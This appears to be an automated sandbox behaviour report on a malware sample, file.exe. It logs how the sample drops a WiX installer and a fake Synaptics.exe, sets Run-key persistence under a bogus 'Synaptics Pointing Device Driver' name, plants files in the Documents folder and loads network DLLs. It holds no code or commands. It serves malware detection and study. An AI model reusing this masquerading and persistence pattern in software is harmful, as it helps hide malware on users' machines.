Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Command line argument: wininet.dll	2_2_00691070
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Command line argument: comres.dll	2_2_00691070
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Command line argument: msasn1.dll	2_2_00691070
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Command line argument: crypt32.dll	2_2_00691070
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Command line argument: feclient.dll	2_2_00691070

Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe

ReversingLabs: Detection: 86%

Source: ._cache_file.exe	String found in binary or memory: Failed to re-launch bundle process after RunOnce: %ls
Source: ._cache_file.exe	String found in binary or memory: Failed to re-launch bundle process after RunOnce: %ls
Source: file.exe	String found in binary or memory: Failed to re-launch bundle process after RunOnce: %ls

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\Desktop\._cache_file.exe "C:\Users\user\Desktop\._cache_file.exe"
Source: C:\Users\user\Desktop\._cache_file.exe	Process created: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe "C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe" -burn.clean.room="C:\Users\user\Desktop\._cache_file.exe" -burn.filehandle.attached=576 -burn.filehandle.self=572
Source: C:\Users\user\Desktop\file.exe	Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: unknown	Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\Desktop\._cache_file.exe "C:\Users\user\Desktop\._cache_file.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate	Jump to behavior
Source: C:\Users\user\Desktop\._cache_file.exe	Process created: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe "C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe" -burn.clean.room="C:\Users\user\Desktop\._cache_file.exe" -burn.filehandle.attached=576 -burn.filehandle.self=572	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: twext.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: shacct.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: idstore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: starttiledata.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: acppage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wlidprov.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: provsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: twext.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: starttiledata.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: acppage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_file.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_file.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_file.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_file.exe	Section loaded: feclient.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Section loaded: feclient.dll	Jump to behavior
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: textshaping.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\ProgramData\Synaptics\Synaptics.exe

File written: C:\Users\user\AppData\Local\Temp\ENSvpt6.ini

Jump to behavior

Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Automated click: I agree to the license terms and conditions
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Automated click: Install

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe

Window detected: Number of UI elements: 23

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common

Jump to behavior

Source: file.exe

Static file information: File size 15745536 > 1048576

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll

Jump to behavior

Source: file.exe

Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0xe59a00

Source:	Binary string: C:\agent\_work\8\s\build\ship\x86\burn.pdb source: file.exe, ._cache_file.exe.0.dr, ._cache_file.exe.1.dr, Synaptics.exe.0.dr
Source:	Binary string: C:\agent\_work\8\s\build\ship\x86\WixStdBA.pdb source: ._cache_file.exe, 00000002.00000002.3581629470.000000006C8EF000.00000002.00000001.01000000.00000008.sdmp, wixstdba.dll.2.dr

Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe

Code function: 2_2_6C8D1C04 LoadLibraryW,GetProcAddress,GetLastError,FreeLibrary,

2_2_6C8D1C04

Source: ._cache_file.exe.0.dr	Static PE information: section name: .wixburn
Source: ._cache_file.exe.1.dr	Static PE information: section name: .wixburn

Source: C:\Users\user\Desktop\._cache_file.exe	Code function: 1_2_000BE876 push ecx; ret	1_2_000BE889
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Code function: 2_2_006BE876 push ecx; ret	2_2_006BE889
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Code function: 2_2_6C8DEE46 push ecx; ret	2_2_6C8DEE59

Persistence and Installation Behavior

Drops PE files to the document folder of the user

Source: C:\ProgramData\Synaptics\Synaptics.exe

File created: C:\Users\user\Documents\DVWHKMNFNN\~$cache1

Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\Desktop\._cache_file.exe	Jump to dropped file
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	File created: C:\Windows\Temp\{4F96F7E1-959C-4DE6-ABC0-2037B4048CBF}\.ba\wixstdba.dll	Jump to dropped file
Source: C:\Users\user\Desktop\._cache_file.exe	File created: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\Synaptics\RCX1D61.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\Synaptics\Synaptics.exe	Jump to dropped file
Source: C:\ProgramData\Synaptics\Synaptics.exe	File created: C:\Users\user\Documents\DVWHKMNFNN\~$cache1	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\Synaptics\RCX1D61.tmp			Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\Synaptics\Synaptics.exe			Jump to dropped file

Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	File created: C:\Windows\Temp\{4F96F7E1-959C-4DE6-ABC0-2037B4048CBF}\.ba\wixstdba.dll			Jump to dropped file
Source: C:\Users\user\Desktop\._cache_file.exe	File created: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe			Jump to dropped file

Source: C:\ProgramData\Synaptics\Synaptics.exe

File created: C:\Users\user\Documents\DVWHKMNFNN\~$cache1

Jump to dropped file

Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	File created: C:\Windows\Temp\{4F96F7E1-959C-4DE6-ABC0-2037B4048CBF}\.ba\license.rtf	Jump to behavior
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	File created: C:\Windows\Temp\{4F96F7E1-959C-4DE6-ABC0-2037B4048CBF}\.ba\1028\license.rtf	Jump to behavior
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	File created: C:\Windows\Temp\{4F96F7E1-959C-4DE6-ABC0-2037B4048CBF}\.ba\1029\license.rtf	Jump to behavior
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	File created: C:\Windows\Temp\{4F96F7E1-959C-4DE6-ABC0-2037B4048CBF}\.ba\1031\license.rtf	Jump to behavior
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	File created: C:\Windows\Temp\{4F96F7E1-959C-4DE6-ABC0-2037B4048CBF}\.ba\1036\license.rtf	Jump to behavior
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	File created: C:\Windows\Temp\{4F96F7E1-959C-4DE6-ABC0-2037B4048CBF}\.ba\1040\license.rtf	Jump to behavior
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	File created: C:\Windows\Temp\{4F96F7E1-959C-4DE6-ABC0-2037B4048CBF}\.ba\1041\license.rtf	Jump to behavior
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	File created: C:\Windows\Temp\{4F96F7E1-959C-4DE6-ABC0-2037B4048CBF}\.ba\1042\license.rtf	Jump to behavior
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	File created: C:\Windows\Temp\{4F96F7E1-959C-4DE6-ABC0-2037B4048CBF}\.ba\1045\license.rtf	Jump to behavior
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	File created: C:\Windows\Temp\{4F96F7E1-959C-4DE6-ABC0-2037B4048CBF}\.ba\1046\license.rtf	Jump to behavior
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	File created: C:\Windows\Temp\{4F96F7E1-959C-4DE6-ABC0-2037B4048CBF}\.ba\1049\license.rtf	Jump to behavior
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	File created: C:\Windows\Temp\{4F96F7E1-959C-4DE6-ABC0-2037B4048CBF}\.ba\1055\license.rtf	Jump to behavior
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	File created: C:\Windows\Temp\{4F96F7E1-959C-4DE6-ABC0-2037B4048CBF}\.ba\2052\license.rtf	Jump to behavior
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	File created: C:\Windows\Temp\{4F96F7E1-959C-4DE6-ABC0-2037B4048CBF}\.ba\3082\license.rtf	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
